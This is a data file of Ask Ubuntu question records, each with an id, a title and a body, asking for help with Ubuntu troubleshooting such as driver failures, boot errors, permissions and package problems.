343481	not able to change ownership for tor	i downloaded the tor browser and i downloaded the tor bundle but when i click on the tor browser i get this /home/username/.tor-browser/data/tor is not owned by this user ( username , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? failed to parse/validate config : could n't access/create private data directory `` home/username/.tor-browser/data/tor '' when trying to change ownership with sudo chown -r $ user ~/.tor-browser i get the answer : no such file or directory , but the file is existent if i double-click the file 'start-tor-browser ' it only opens , although properties are set to 'execution of file is permitted ' .
343482	partitioned external hard drive : where are my files ?	i recently upgraded my laptop hard drive and did a fresh install of 12.04.3 . i stuck my old hard drive into an external enclosure to use as an external - but first , i need to get all my data off it . the old hard drive was dual boot with win7 and ubuntu ... here is the output of sudo fdisk -l : so , sdb is obviously the external . however , i 've tried mounting all 3 of those partitions - sdb1 , sdb2 and sdb3 , and none of them seem to be my old ubuntu partition . sdb2 is my win7 partition ( which is nice ) , sdb1 is my win7 recovery partition ( useless ) and i 'm not sure what sdb3 is ( it has folders like `` bin '' , `` boot '' , `` images_boot '' , `` planfolder '' , and so forth . any ideas on where to find my ubuntu partition ? as a last resort , i can re-install the old hard drive , dump everything i need off the ubuntu partition onto another external , reinstall the new hard drive , and carry on . thanks !
343488	error 18 : selected cylinder exceeds maximum supported by bios	kernal boot error : after a recent update to kernel 2.6.32-50 , i get this error on boot : error 18 : selected cylinder exceeds maximum supported by bios if i choose 2.6.32-49 , it works fine . any suggestions on what has changed to run the latest kernel ? i have an older system . hd 's are eide and the processor is a pentium 350m . any suggestions for resolution would be appreciated . thanks .
343490	the bug is not reproducible , so it is likely a hardware or os problem	i 'm trying to install samba 4.0.9 on one server but i keep getting this error everytime . i have tried everything from apt-get -f install to editing /var/lib/dpkg/status package : samba4 install ok installed this is the error i get : [ 866/3792 ] compiling source4/dsdb/common/util.c [ 867/3792 ] compiling source4/dsdb/common/util_groups.c in file included from ../lib/replace/system/time.h:30:0 , from ../source4/include/includes.h:33 , from ../source4/dsdb/common/util_groups.c:22 : /usr/include/i386-linux-gnu/sys/time.h:61:3 : internal compiler error : segmentation fault please submit a full bug report , with preprocessed source if appropriate . see < file : ///usr/share/doc/gcc-4.6/readme.bugs > for instructions . the bug is not reproducible , so it is likely a hardware or os problem . waf : leaving directory `/samba/bin' build failed : - > task failed ( err # 1 ) : { task : cc util_groups.c - > util_groups_6.o } make : *** [ all ] error 1 if more information is needed i will provide it for you . thanks in advance .
343491	what is the naming convention for click packages ?	i have made a ubuntu touch app and intend to upload it to the click app store . what is the naming convention that i should use for naming my click package ?
343494	ibus 1.4.1 input switch major lag ( xubuntu 12.04 )	i am absolutely sure it 's an ibus problem . it does n't want to switch , lagging for a few minutes up to an hour , from any language to any language . it is selected as the keyboard input method system and starts on log-in . ( i have japanese anthy and mozc installed , along with default - it absolutely refuses to use mozc though ) . it does n't matter if you 're using a keyboard shortcut , embedded-in-toolbar-icon menu , ibus preferences , or floating selector in the corner of your screen . this is driving me nuts . in fact , the only method i 've found is basically cheating : switch to anthy , go do something for half an hour , and if anthy decides to initialize i get to use its latin input option ( that 's buggy and gives random double-width spaces , etc ) . is there any way to get it to reliably switch between input options in , like , 10 seconds or less ( or at least show me a g-d progress bar ) ? if not , is there another input method ? ( scim , uim , prime keep coming up but i do n't want to install things willy-nilly )
343502	how to rsync to android	how can i connect to my android device to rsync music ( or other stuff ) ? i tried mtpfs , but it fails . user @ pc > mtpfs mnt unable to open ~/.mtpz-data for reading , mtpz disabled.listing raw device ( s ) device 0 ( vid=04e8 and pid=6860 ) is a samsung galaxy models ( mtp ) . found 1 device ( s ) : samsung : galaxy models ( mtp ) ( 04e8:6860 ) @ bus 1 , dev 15 attempting to connect device ignoring libusb_claim_interface ( ) = -6ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device
343503	accidentally deleted my packages	i have ubuntu 12.04lts 64 bit installed parallel to windows 7 on my laptop . while installing skype on ubuntu , i installed some dependencies of skype , and it removed almost all of my packages installed on laptop . skype installed , but nothing else remained . after the installation completed , the desktop disappeared . i believe my ubuntu-desktop uninstalled . the software center disappeared too , so did python . while the internet was still working , i installed firefox , vlc and nautilus . then i restarted the pc . i can not access the internet from ubuntu now ( do not know how ) . as the desktop is gone , i can only login commandline , with no packages ! i tried opening vlc , firefox and nautilus , each of these asks for display options . is it possible to restore to the default package settings without losing any data ?
343508	trying to make usb install disk in osx . cant boot it after completion	i have followed the steps shown here : create a usb stick on mac osx however , when i am finished with the dd=if command , a window pops up straight away telling me that the disk can not be mounted . and when i try to boot it after restart it does not show either . any ideas ? i have tried two times now ( all though with the same file ) .
343509	ubuntu 12.04 stuck on checking battery level	after updating ubuntu and when i restart it this happened , how do i fix ? neither of these questions helped me : 12.04 hangs at `` checking battery state '' can not boot into ubuntu after crash
343510	installing 'wine ' triggers a kernel panic , what can i do about this ?	i was installing wine with the command sudo aptitude install wine and the computer crashed . when i run sudo dpkg -- configure -a , the computer crashes again . what can i do ?
343514	how do i edit the /etc/hosts file ?	i 'm new at linux and i just download ubuntu 12.04 lts . i found a spot that showed me how join my windows active directory . it has me add couple lines into the 'hosts ' but i 'm not able to edit the file because i do not have the permission . i 'm not the owner . i use chmod with it rwx and still it will not let edit the file . how do you change the permission ? thanks
343516	emacs when run from the applications menu ( via . desktop setting ) does n't load environment variables	so when i invoke emacs from the terminal , all my environment variables are loaded correctly from .bashrc . however , when i load emacs from the ubuntu application menu ( by invoking the /usr/share/applications/emacs24.desktop ) it loads no environment variables . can i adjust the desktop setting to do so ?
343517	keyboard shutcuts not working on xubuntu	my keyboard shortuts no longer work ( for example super t for termanal super r for run etc ) ive found a few help threads online including here ) after xubuntu 10.04 to 10.10 upgrade , my keyboard shortcuts no longer work i get `` command not found '' for that ive deleted my ./cache/sessions/* ive reset my keyboard shortcuts any other suggestions ?
343522	usb to serial adapter does n't works	i have a usb to serial adapter . it works ok with my desktop computer , but no on my laptop . my desktop pc is a generic computer ( athlon 64 x2 6000+ on board msi k9agm , 6 usb 2.0 ports , no usb 3.0 ports ) , and my laptop is an hp envy4-1015dx ( 2 usb 2.0 ports , 1 usb 3.0 port ) my desktop has ubuntu 12.04.2 64 bits , kernel 3.5.0-37 . when i plug it into any usb port on this pc , i got this in kern.log : sep 9 15:31:07 amdx2 kernel : [ 57.968035 ] usb 4-2 : new full-speed usb device number 2 using ohci_hcd sep 9 15:31:07 amdx2 kernel : [ 58.128306 ] usb 4-2 : new usb device found , idvendor=4348 , idproduct=5523 sep 9 15:31:07 amdx2 kernel : [ 58.128311 ] usb 4-2 : new usb device strings : mfr=0 , product=0 , serialnumber=0 sep 9 15:31:07 amdx2 kernel : [ 58.302088 ] usbcore : registered new interface driver usbserial sep 9 15:31:07 amdx2 kernel : [ 58.302530 ] usbcore : registered new interface driver usbserial_generic sep 9 15:31:07 amdx2 kernel : [ 58.302544 ] usb serial support registered for generic sep 9 15:31:07 amdx2 kernel : [ 58.302548 ] usbserial : usb serial driver core sep 9 15:31:07 amdx2 kernel : [ 58.318155 ] usbcore : registered new interface driver ch341 sep 9 15:31:07 amdx2 kernel : [ 58.318178 ] usb serial support registered for ch341-uart sep 9 15:31:07 amdx2 kernel : [ 58.318194 ] ch341 4-2:1.0 : ch341-uart converter detected sep 9 15:31:07 amdx2 kernel : [ 58.340514 ] usb 4-2 : ch341-uart converter now attached to ttyusb0 however , when i plug exactly the same adapter with the same usb cable into any port on my laptop ( it does n't matters if i plug it into a usb 2.0 or usb 3.0 port ) , i got : sep 9 15:31:50 envy4 kernel : [ 10776.099052 ] usb 3-1 : new full-speed usb device number 37 using xhci_hcd sep 9 15:31:50 envy4 kernel : [ 10776.115364 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:50 envy4 kernel : [ 10776.235486 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:50 envy4 kernel : [ 10776.450932 ] usb 3-1 : new full-speed usb device number 38 using xhci_hcd sep 9 15:31:50 envy4 kernel : [ 10776.467242 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:50 envy4 kernel : [ 10776.587459 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:50 envy4 kernel : [ 10776.802756 ] usb 3-1 : new full-speed usb device number 39 using xhci_hcd sep 9 15:31:50 envy4 kernel : [ 10776.819142 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:51 envy4 kernel : [ 10776.939484 ] usb 3-1 : device descriptor read/8 , error -71 sep 9 15:31:51 envy4 kernel : [ 10777.042877 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 my laptop has ubuntu 12.04.3 64 bits , kernel 3.8.0-30 . i see that the main difference is that , in my pc , ubuntu uses driver ohci_hcd , and in my laptop ubuntu uses xhci_hcd . i 've tried doing : sudo modprobe ohci_hcd and also tried : sudo modprobe -r xhci_hcd however , none of these works . in first case , no error at modprobe , but system still uses xhci_hcd . in second case , on modprobe it gives me an error : fatal : module xhci_hcd is builtin what else could i do to solve my issue ? thanks !
343523	segmentation fault on reboot ubuntu 12.04	i have an ubuntu 12.04 server image running on a vmware vm . i am getting a segmentation fault when rebooting the system . i am unable to figure out what the problem might be . here is a screenshot :
343524	full ubuntu install	i have an old computer ( only 512mb ram ) which i would like to totally dedicate to ubuntu o.s i plan to use it to explore development and such like , what would i have to do to completely erase the system i have on it now and fully install ubuntu ? thanks .
343526	enable idt high definition audio codec hardware enhanced sound	i brought a new hp pavilion 6g 2301ek laptop and among the driver problems i encountered ( which i could n't solve ) is the idt hardware enhancement . on windows , using the generic sound driver , the sound output is the same as in ubuntu now . right after installing the idt driver on windows , it could enable the dolby hardware enhancement , i could n't do the same on ubuntu . any solutions ? i could n't find any driver on the net , some people suggested software solutions but i need to use the integrated hardware for this . i 'm using ubuntu raring 64bit version . some outputs cat /proc/asound/card0/codec # * | grep codec codec : idt 92hd87b2/4 codec : intel pantherpoint hdmi aplay -l default playback/recording through the pulseaudio sound server sysdefault : card=pch hda intel pch , stac92xx analog default audio device front : card=pch , dev=0 hda intel pch , stac92xx analog front speakers surround40 : card=pch , dev=0 hda intel pch , stac92xx analog 4.0 surround output to front and rear speakers surround41 : card=pch , dev=0 hda intel pch , stac92xx analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pch , dev=0 hda intel pch , stac92xx analog 5.0 surround output to front , center and rear speakers surround51 : card=pch , dev=0 hda intel pch , stac92xx analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pch , dev=0 hda intel pch , stac92xx analog 7.1 surround output to front , center , side , rear and woofer speakers hdmi : card=pch , dev=0 hda intel pch , hdmi 0 hdmi audio output dmix : card=pch , dev=0 hda intel pch , stac92xx analog direct sample mixing device dmix : card=pch , dev=3 hda intel pch , hdmi 0 direct sample mixing device dsnoop : card=pch , dev=0 hda intel pch , stac92xx analog direct sample snooping device dsnoop : card=pch , dev=3 hda intel pch , hdmi 0 direct sample snooping device hw : card=pch , dev=0 hda intel pch , stac92xx analog direct hardware device without any conversions hw : card=pch , dev=3 hda intel pch , hdmi 0 direct hardware device without any conversions plughw : card=pch , dev=0 hda intel pch , stac92xx analog hardware device with all software conversions plughw : card=pch , dev=3 hda intel pch , hdmi 0 hardware device with all software conversions lspci -nn | grep -i audio 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 )
343530	`` the selected disc image file is n't valid '' error	i have been attempting to run raring ringtail ( 13.04 ) on my windows 7 computer , just to see how it is . i 'm not going to replace my whole os ... ( yet . ) anyway , my bios does n't support boot from usb so i am attempting to burn to dvd . i have it downloaded and used the windows disc image burner to attempt to burn it to my dvd . when i try to burn it , it gives me this error : the selected disc image file is n't valid . any thoughts ?
343535	how do i install network drivers on my ubuntu server os via command line	basically as the title says , i have n't any idea how i am to install network drivers onto my dell poweredge 2950 ii . i am a complete noob when it comes to command line and its operations . just to add-to this , considering that drivers may not be the issue , i plug in the ethernet cable in both of the ports in the back . a red light blinks when there is no internet connection . when plugging in the cable it continues to blink , but the cable responds with the nic with a solid green light on the left and a yellowish/orange blinking on the right . using 13.04 if i leave out any required information please tell me . edit : ethernet = http : //i.imgur.com/rlkjavm.jpg results of sudo ifconfig = http : //i.imgur.com/croqroi.png
343536	13.04 installs the wrong iso	when i download the 64 bit 13.04 , no other options are given and the download just begins . i am using a mac and this default is the wrong processor .
343538	user permissions inheritence	if an owner can read and write and the group can read and execute , can the owner execute the file ? do file permissions stack ?
343545	lxc on precise with linux-image-generic-lts-raring ... do i get the full namespace support ?	kernel 3.8 adds full namespace support , as far as i am aware . the package linux-image-generic-lts-raring ( `` raring ringtail kernel '' ) offers this on precise pangolin installations ( screenshot ) : older versions need to explicitly install it ( see here , also see `` lts enablement stack '' ) . clearly i am using userland-tools to access the functionality . will it benefit me to install the linux-image-generic-lts-raring or is the functionality unavailable due to the userland-tools being `` outdated '' ?
343548	what version of ubuntu do i need for a intel core 2 duo laptop with 6gb ram ?	i have a laptop with windows 7 pro and a core 2 duo processor . ( lenovo sl510 laptop ) my lpatop has 6gb ram . what version of ubuntu do i need ? and will it work at all ?
343551	install linux to hard drive from live partition	i was thinking that i could make a small 4gb partition on my 320gb hard drive . this small partition could be used as a live install partition . what i would do is i would make the partition , boot from it , then use the boted live isntall to install ubuntu to a different partition . then i would boot from the newly created partition and change the live install to a different live install . then i would boot from the new install and install to another partition . then i would do the same 1 or 2 more times . dont ask me why i want to install the 3 or 4 different derivatives instead of just installing multiple desktop environments on one install . i just do . thanks , ashton .
343553	ubuntu 13.04 runs perfectly without battery , but with battery it does n't boot	ubuntu 13.04 runs smoothly if i have no battery on my laptop , but when i insert the battery my pc wo n't reset or turn on after a shutdown . the specifications of the laptop are the following : lenovo ideapad z480 ram : 6 gb processor : intel® core™ i5-3230m cpu @ 2.60ghz × 4 64-bit linux hard disk/drive : 1 tb
343557	run ubuntu concurrently with windows 7	i already have a windows 7 installed on my pc ... what i did was i shrink the entire volume out of my unified hard disk which was of 750 gb . now i am getting a `` simple volume '' as indication in my disk management and not a `` primary volume '' my question is : i am using a flash drive which i made bootable using the software available on linux 's website to install ubuntu . is it necessary to have a primary volume in windows 7 to mount linux ubuntu 12.04 concurrently with windows 7 ? or i can do it with simple volume as well ?
343560	update server php version to 5.4.10 via the command line	im setting up a vps for the first time from scratch , the host has a one click lamp installer which took out allot of the leg work , but running phpinfo ( ) ; i found im running 5.3.10 . so id like to update it to 5.4.10 - ive run sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt but it says php5 is the latest version , any ideas about how to update this ? the server is running ubuntu 12.04
343562	why chrome do not start from launcher after i closed the lid ?	i 've closed the laptop cover , freezing the computer , before dinner . when i came back , i entered the password and tried to resume the active applications , chrome and firefox ( from launcher ) . chrome did n't start , firefox did . weird ... tried to start chrome from launcher several times , without success . it does seem to start , a window is briefly seen , but minimizes or closes immediately . can not identify the chrome version because it does n't even show up . firefox version is 23.0 , ubuntu version is 12.04 lts . what 's happening with chrome ? it was working fine before dinner .
343564	is it safe to remove generic kernel image on ec2 ?	i was tempted to remove the *-generic kernel image from my ec2 instance since it 's not the one running , according to uname . what 's running is the *-virtual one . thing is i 'm not sure if it 's safe , me not being comfortable with how these ec2 things work .
343566	are their any book cataloguing apps for ubuntu ?	i 'm trying to transition from most webapps to desktop apps ( partly due to pernicious overseas three-letter agencies ) , but i ca n't find any replacement for the book-managment site goodreads . i do n't own any ebooks ( my collection is paper-only ) , so from what i gather calibri wo n't be much use to me ; i want an app purely for cataloguing my book collection , though additional features are welcome . desired features the features that a suitable app might have ( not all are strictly required ) : ability to add and catagorise books . access to that data , either directly or by exporting to json | md | xml . metadata download from an online metadata api ( amazon , goodreads ) . book recommendations based on my collection . gnome integration . do any suitable apps available for linux ? any app even remotely converging on these features would be helpful . i found a similar question , but it was more specifically about greek language integration . what book-library organizing programs are available ? if my question needs refinement or additional information please leave a comment below . thanks .
343569	once ubuntu is installed , can i still update other operating systems ?	right now , i am a newbie almost ready to install ubuntu alongside windows 8 on my laptop soon , and have gone through most of the things i need to plan . lately , i noticed that microsoft is preparing windows 8.1 as a free update to windows 8 users . what i would like to know , is when i install ubuntu on my computer , will i still be able to update windows to 8.1 ( same goes for other operating systems if i ever decide to install other distros ) ? i definitely will want the update to windows 8.1 instead of windows 8 , so i need to know if i need to wait until 8.1 is released , or if i can go ahead and install ubuntu right now . the bottom line is : will i be able to upgrade windows 8 to 8.1 with ubuntu installed on my system , or do i need to remove it in order to do that ?
343572	can not install ubuntu 11.04 apps on live usb	i have ubuntu 11.04 on a 3.6gb usb flash drive . my wifi connection is working fine . but , i can not install apps via sudo apt-get install . it says , failed to fetch repository . i try the software repository app and that says fail too due to some 404 not found error . i am forced to go to the website for the repository and download .deb files and install , windows style . what is the reason for this ? maybe i am using an old ubuntu version and the repo is shut ? thanks .
343574	default programs bar gray-out	i 've had this problem since i upgraded from 12.10 to 13.04 and have been trying to fix it ever since , but i have tried everything i could think of . my problem happens with most of the default programs ( libreoffice , firefox , software center , etc . ) and with one downloaded program called musescore . what happens is when i click the top bar ( where minimize , maximize , close are ) the windows goes to the backgound and does n't do what i clicked on . this is especially frustrating when another window is behind it , because then that window closes . i am currently using the cairo dock session , but the problem ocurs on the gnome fallback as well ( the default ubuntu session has been dead since upgrade and is at a point of no return ) . any help would be appreciated ! i will post screenshots ( or a video if possible ) upon request . here are my hardware details : lenovo ideapad n580 . pentium 4 b960 @ 2.2ghz ; upgraded 8gb ram . intel hd graphics integrated with cpu .
343583	will this work on my laptop ?	i have a laptop with windows 7 pro and a core 2 duo processor . ( lenovo sl510 laptop ) my lpatop has 6gb ram . what version of ubuntu do i need ? and will it work at all ? p.s . i have integrated graphics ...
343586	can i create a custom `` taskbar '' in ubuntu unity	as the title says , i am creating a theme for my ubuntu 12.04 unity session creation in progress for a buddy of mine . i would like to add an image on the lower portion of my screen . i have taken the requested taskbar and made a taskbar.png file that i wish to add as the taskbar with buttons that perform commands when pressed . am i expecting to much as in simplicity or would i have to do major programming ? i have seen something that is similar to what i wish to do , using tint2 for a taskbar , this might be simpler if theres a way to edit this with its own theme .
343594	how do i allow anyone to view my files on my network ?	i have created a little server on ubuntu 13.10 , i 've shared certain folders using samba . on my windows pc my username and password is the same as the username and password of the server , so i 'm assuming that 's why i can connect there , but connecting to the server from my brothers pc is a different story . i have added to /etc/sudoers : jinglez all= ( all : all ) nopasswd : all thinking that when he try 's to map a new network drive , that he then would be able to login as jinglez and the server password , but this did n't work , however when we created a new user account on his pc , with the above info it did , does anyone know how to fix this ?
343596	installed ubuntu but wo n't boot , shows blank screen	i installed ubuntu 12.04 by setting the mode to `` acpi=off '' . when i try to boot the program i went to the part that has `` quiet splash '' and put acpi=off to start it up . it does , but it just shows me command lines . i 've tried `` nomodeset '' but that takes me to a blank screen . is there something else i could try ?
343603	will awll6077v2 wireless n 300 usb adapter	will awll6077v2 wireless n 300 usb adapter work with ubuntu running in dual-boot on a macbook pro osx 10.8 ? the embedded chipset in awll6077v2 is realtek rtl8192su i can get support driver for unix ( linux ) from realtek for linux kernel 2.6.18~2.6.38 and kernel 3.0.2 android 1.6~2.3 and 4.0 question : will these drivers run on ubuntu 12.04 and/or ubuntu 13 kernels
343606	how to boot back into windows 8 after deleting its boot path ?	i recently booted into ubuntu 12.04 for the first time and with great difficulty at that . in the process i may have deleted the boot path back to windows 8 ... im not sure i just really wanted ubuntu but now i feel like since this should be a `` dual boot i have the right to get back into windows 8 if i ever wanted to . please help i have no idea . when in grub i can select windows 8 to boot into but an error screen pops up and says : '' file : \boot\bcd status : 0xc000000c info : the boot configuration data for your pc is missing or contains errors . ''
343608	installing the touch preview on my samsung galaxy tab 2	i have a samsung galaxy tab 2 ( 7.0 ) . i have never liked the android os or the tablet in general , and wanted to try out ubuntu touch . i have done multiple searches on the internet to try to figure out the process of rooting the tablet and installing the new os ( i am a developer in general and am good with an ubuntu terminal , but have absolutely no experience with the bowels of android ) , but have n't found anything useful . i was looking for some ( simple ) instructions on installing touch on the galaxy tab 2 , using either a windows pc or an ubuntu laptop ( whichever works ) . i have found a few other posts , but many are old and refer to multiple different , fractured tutorials . can anyone give me some instructions on installing touch on my tablet ? note : before anyone marks this as a duplicate , i have looked through all of the other questions about this on these and other forums . so far , i have not found any that answer my question .
343610	i need clarification on root password	recently i was attempting a terminal command using sudo . i thought it wanted my administrative password , but it really wanted root ... which i have forgotten or screwed up ... .so my objective failed . i am using ubuntu 13.04 . would you please tell me what i should do ?
343613	i am trying to update 12.04 to 13.04 but i get a message saying `` saving installed packages ... ''	the dots go round and round but after a few hours of this i have to kill the process .
343616	dpkg exit with error parsing file `/var/lib/dpkg/status` , what to do ?	when i go to install a software , i encounter this error..therefore i can not get update.. preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/status ' near line 51245 package 'oracle-xe ' : mixed non-coinstallable and coinstallable package instances present n : ignoring file 'gcl ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension n : ignoring file 'gcl ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension e : sub-process /usr/bin/dpkg returned an error code ( 2 )
343622	intel wireless cnetrino advanced-n 6235 ubuntu 13.04 not working	i know that you might think this question has been answered but i promise you that i have tried every single page in google search but nothing worked . i bought a thinkpad t431s and i wiped out the windows 8 and install windows 7 and now installed ubuntu 13.04 kernel 3.8 i can get to the internet by cable but no wireless whatsoever can be found at all . the bluetooth symbol is show up close to the network and clock on the panel top right . i downloaded iwlwifi-6000g2b-ucode-18.168.6.1.tgz and copied the files into the correct directory , restarted my laptop but no good . here are some pages i visited but got nothing working from them wireless with intel centrino advanced-n 6235 , and can not get wireless card to even show up and many others . and i even tried this installing this wireless-iwlwifi-precise-dkms_3.6precise1sutton5_all.deb i would really appreciate it if someone can help me getting the wireless working . thanks guys before you continue reading , my problem was solved . if you interested in the solution just skip all th commands and their output until you see the second dashed lines . the output for this command sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579lm gigabit network connection [ 8086:1502 ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation qm77 express chipset lpc controller [ 8086:1e55 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 02:00.0 system peripheral [ 0880 ] : ricoh co ltd mmc/sd host controller [ 1180 : e822 ] ( rev 07 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088f ] ( rev 24 ) output for lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 147e:2020 upek bus 001 device 004 : id 8087:07da intel corp . bus 001 device 005 : id 5986:026a acer , inc output for sudo lshw -- class x hardware lister ( lshw ) - b.02.16 usage : lshw [ -format ] [ -options ... ] lshw -version -version print program version ( b.02.16 ) format can be -html output hardware tree as html -xml output hardware tree as xml -short output hardware paths` -businfo output bus information` options can be -class class only show a certain class of hardware -c class same as '-class class' -c class same as '-class class' -disable test disable a test ( like pci , isapnp , cpuid , etc. ) -enable test enable a test ( like pci , isapnp , cpuid , etc. ) -quiet do n't display status -sanitize sanitize output ( remove sensitive information like serial numbers , etc . ) -numeric output numeric ids ( for pci , usb , etc . ) output for sudo lshw -class network *-network description : ethernet interface product : 82579lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 3c:97:0e : b9 : ab:46 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k firmware=0.13-3 latency=0 link=no multicast=yes port=twisted pair resources : irq:41 memory : f1500000-f151ffff memory : f153b000-f153bfff ioport:4080 ( size=32 ) *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 24 serial : 08 : d4:0c:04:71 : f3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-30-generic firmware=18.168.6.1 ip=192.168.1.3 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : f0c00000-f0c01fff output for lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 system peripheral : ricoh co ltd mmc/sd host controller ( rev 07 ) 03:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) output for rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no i do n't know exactly what happened but here is the last thing before it suddenly worked . i did copy the firmware to /lib/firmware but then the touchpad ( mouse ) for thinkpad t431s is very sensitive and actually bad without lenovo settings and synaptics driver so i decided to lunch ubuntu software center and search for synaptics and i found synaptic package manager and i installed it then i clicked on mark all upgrades then apply after downloading and installing the updates i restarted my laptop and then i clicked on the network beside the clock and i see the wireless networks showing up . i hope someone can benefit from this .
343624	backtrack repository adding to ubuntu 12.04 error	after executing wget http : //all.repository.backtrack-linux.org/backtrack.gpg -o â | sudo apt-key add - i 'm getting an error like gpg : no valid openpgp data found . how can i complete this task successfully ?
343625	rasbperry pi , emulation on ubuntu	i was looking to virtually emulate raspberry pi on ubuntu 12.04 . if anyone has tried it , please provide the instruction for that . i saw some article : rasbperrypi.org . but i 'm still confused , if anyone have done it ... please provide simple and sure-shot way to emulate it ... . in this tutorial there is a field -append /dev/sda2 ; can anyone help whether , it 's the virtual field or my real disk ... .i do n't want to play with my disk data .
343630	install 64-bit os on an old pc ?	before downloading , there is an option to choose 32 bit or 64 bit , but it says only newer pc 's . can i still install this os on my old 64 bit pc ?
343633	launching firefox through putty , and open it up in lxde desktop	i am trying to run from local machine firefox on remote server , and do n't know how to accomplish that . i use putty to connect to server and when i type the firefox command , i get error : no display specified i have lxde desktop installed on ubuntu 12.04 and use tightvnc to access server desktop . what i need to do is launch firefox locally and be able to use firefox in vnc session . thanks
343639	i get `failsafe-x main process terminated with status 1` while login , how to fix it ?	i am running ubuntu 12.04 lts . i accidentally terminated the terminal during a sudo apt-get upgrade or sudo apt-get update . at least that seems to be the most logical explanation of my issue , as my computer started acting strange right after i did that ... thus , i restarted it and now i can not login to my machine . instead i get the following message : init : plymouth-stop pre-start process ( 1545 ) terminated with status 1 eth0 : no ipv6 routers present init : failsafe-x main process 1393 terminated with status 1 from grub , i can access the previous version of linux . however , i can not run opengl in this previous version of linux . i hope that could provide some insight . how do i fix my machine ? if you need any additional information , let me know !
343640	how to upgrade kernel version 3.10 from ubuntu 13.04	i want to upgrade kernel . now my linux kernel is 3.8.0-19-generic . how to upgrade my kernel ? i am linux beginner .
